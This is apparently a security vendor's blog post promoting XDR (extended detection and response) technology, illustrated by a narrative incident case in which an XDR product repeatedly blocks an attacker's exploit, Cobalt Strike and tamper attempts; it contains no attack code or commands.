The community of security experts bears more responsibility today than ever before. The dramatic increase in cyber attacks using ransomware and phishing calls for dynamic security strategies. Key here is the ability to recognise threats at an early stage and react immediately. With their centralised collection and AI-supported, behaviour-based analysis of data, XDR technologies offer a holistic solution. In this part you will learn how XDR works as an AI-supported technology, how it protects the most common attack vectors 24/7 and actively supports your Security Operation Center (SOC) from “detection” to “response” – vividly illustrated by a concrete IR case.
The Swiss Federal Office for Cybersecurity (BACS) has once again highlighted the dramatic increase in cyber attacks such as phishing and compromised user accounts. Regardless of company size and sector, Security Operation Centers (SOC) are required to identify security gaps in the IT infrastructure, offer comprehensive system protection and detect threats at an early stage. But that’s not all: with the rapid pace of technological progress, there is also a growing need to respond quickly and effectively to suspicious activities and security incidents and to return compromised IT systems to normal operation as quickly as possible. This is an enormous challenge for humans to manage – but with technological support, it no longer feels like magic.
Extended detection and response (XDR) offers a comprehensive solution by recognising attacks in a company’s digital assets and coordinating response measures. XDR technology thus provides security experts with a holistic view of the security situation.
The essence of XDR is that by implementing this AI-supported technology, endpoints, network traffic and user behaviour can be analysed holistically. By combining various analysis techniques, XDR platforms can recognise threats at an early stage and initiate automated responses that block or at least contain potential attacks. Because XDR takes account of the fact that cyber attackers are increasingly using automation and AI technologies, it makes sense for the defence tool to use the same technological methods.
The holistic and self-learning nature of XDR enables security teams to understand and respond to any type of threat across different vectors. This capability relieves the burden on the company’s SOC while also increasing the effectiveness of cyber defence.
In view of the constantly growing and increasingly complex threat situation, we’re now able to successfully fend off a comparatively high proportion of incidents thanks to self-learning, high-performance endpoint solutions such as managed detection and response (MDR) and extended detection and response (XDR).
The figures speak for themselves: with a 65 percent year-on-year increase in incidents in 2023, customers in around 48 percent of cases found themselves in a compromised but undamaged state. This is due on the one hand to better IT visibility and on the other to the technical support provided by XDR solutions, which are effective in slowing down potential attacks.
For those affected, a cyberattack scenario is like a storm that threatens to plunge everything into chaos – dramatically and scarily! But even in this storm, the stages of the attack follow a clear, (almost) standardised pattern: an attack always starts with what is termed initial access – the critical entry point.
Below we analyse the three entry points at the greatest risk (labelled A1 to A5 in Figure 2):
Due to the high success rate of phishing, it makes sense to invest in awareness-raising measures:
1. Sharing passwords and/or two-factor authentication codes
2. Email attachments that contain malware
XDR offers excellent options for detecting and blocking malware infections on endpoints and responding in a targeted manner.
Let’s look at an example to examine the practical benefits of XDR. A company that manages the XDR stack internally was infiltrated by an attacker who deployed a successful phishing campaign to gain access to a user account. In this case, InfoGuard-CSIRT was tasked with performing a compromise assessment to retrospectively investigate the exact facts of the case.
Let’s have a look the details of the incident together:
As the company had not implemented multi-factor authentication, the attacker could easily access the company’s virtual desktop infrastructure (VDI). On 24 February, the attacker attempted to use an exploit published in October 2021 to extend their privileges. The XDR technology successfully blocked this attempt. The attacker withdrew – for the time being!
About two-and-a-half months later, the attacker returned and launched a download of Cobalt Strike, an attacker framework for command-and-control activities. This attempt again failed due to the behaviour-based detection by XDR, which recognised the downloading of malicious files or downloads via unusual means such as PowerShell or bitsadmin as suspicious activity and blocked them. Despite further attempts to get the malware onto the system, XDR successfully prevented them all.
The attacker returned on 22 June, presumably motivated by new ideas. After researching the web, they seem to have come across a blog article published in May that describes a method for enhancing privileges. The attacker launched the commands as described in the article, regardless of the fact that the target company’s environment was not akin to the infrastructure mentioned in the article. The XDR technology also successfully blocked this attempted attack.
On 5 July, the attacker attempted to uninstall the security software Cortex XDR and failed thanks to tamper protection. On 16 July, they used an exploit that had only been published two days earlier. The XDR solution also recognised and blocked this attack. The attacker still refused to give up and returned the next day. Once again they tried to attack with a Cobalt Strike – once again unsuccessfully!
The attacker was unable to cause any damage despite persistent attempts at an attack. It has to be said that the company was lucky: not only did the attacker behave in a relatively inexperienced manner, their activities were spread out across a longer timeline. Experience shows that attack attempts and successful intrusions are happening increasingly close together these days.
Without the XDR solution, the attack would have led to a successful ransomware compromise in February or March. After analysing and reconstructing the attack, our most urgent recommendation to the company was to implement multi-factor authentication to prevent future attacks.
This case illustrates how state-of-the-art, behaviour-based technologies such as the XDR solution successfully fend off potential attacks. At the same time, this example also emphasises the need for clear processes, established instructions and safety guidelines in order to be able to react appropriately to alerts.
Let’s examine the basic components and functionalities of XDR systems and their integration into the corporate infrastructure.
XDR systems can be sourced from various providers such as Microsoft, CrowdStrike and Palo Alto. A central element of this architecture is agent-based data acquisition. Agents fulfil two essential functions on the operating systems:
Various data sources need to be integrated to obtain a complete overview of the security situation:
The XDR console offers extensive analytical functions that are enhanced by the data collected:
Seamless embedding of XDR systems in your security strategy is a significant advantage for efficient cyber defence. This ensures that your Security Operation Center (SOC) is optimally positioned and meets the highest security standards 24/7.
Is your organisation focused on building a successful, centrally controllable cyber defence concept that supports your Security Operation Center (SOC) around the clock? You now know that you can hugely enhance the potential of your cyber defence with an XDR stack.
We’ll be happy to support you with planning and concrete implementation. Our “ISO 27001:2022”-certified security experts will advise you on planning and concrete implementation and help you determine the most suitable XDR product for your IT environment.
Our two-part blog series on “The Magic Word for Efficient Defence against Modern Cyber Attacks” gives you a complete 360-degree perspective:
Also for streaming: Ernesto Hartmann, Chief Cyber Defence Officer, and Sandro Bachmann, Senior Incident Responder, discussed how XDR can be used to effectively defend against cyber threats during an InfoGuard Security webcast.
The recording of this webcast is available as a YouTube video. It's well worth listening to!
Caption: AI generated image